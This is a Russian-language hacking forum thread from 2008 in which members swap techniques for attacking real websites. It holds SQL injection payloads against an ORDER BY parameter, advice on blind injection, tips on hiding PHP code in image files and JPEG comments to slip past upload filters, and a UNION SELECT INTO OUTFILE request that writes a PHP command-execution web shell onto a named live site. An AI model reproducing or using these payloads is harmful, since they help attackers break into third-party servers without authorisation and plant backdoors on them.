Ваши вопросы по уязвимостям.

04.01.2008, 01:41

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Piflit, по ссылке только про xss написано...
Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\

𝕏 Twitter Reddit Telegram Копировать ссылку

04.01.2008, 02:22

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Покапался нашел скул после order by
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот.
Да, там точно скул есть.
ssort=(-skill*(1=1))--
обрезание запроса

Последний раз редактировалось AFoST; 04.01.2008 в 02:29.. Причина: точно есть

04.01.2008, 02:29

Noiro

Познающий

Регистрация: 01.01.2008

Сообщений: 50

С нами: 9662713

Репутация: 71

Цитата:

Сообщение от AFoST

Счас покапался, типа это наверное скул после ордер бай
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот...

Если поддерживаются подзапросы, пробуй сделать слепую иньекцию.

04.01.2008, 02:33

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

угу, плюсенг, но их там полно

__________________
Карфаген должен быть разрушен...

04.01.2008, 15:06

sedoy_xxx

Участник форума

Регистрация: 05.07.2006

Сообщений: 285

С нами: 10447586

Репутация: 117

Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации

04.01.2008, 15:27

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Про расширения тут глянь:
https://forum.antichat.ru/threadnav23501-1-10.html

Цитата:

дописать php код в какие-то теги

_)))))) В <?php ?> наверно

Открываешь картинку редактором(по вкусу) и дописываешь в конец...

04.01.2008, 15:56

.Begemot.

Участник форума

Регистрация: 27.03.2007

Сообщений: 161

С нами: 10065986

Репутация: 785

Подобрал -

Код HTML:

http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*

Хочу залить шел -

Код HTML:

http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*

Не получается!

1) В заппосе что то не так или прав на зипись нету?
2) В слепой инжекции можно шел залить?

Последний раз редактировалось trumps; 04.01.2008 в 15:59..

04.01.2008, 15:51

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.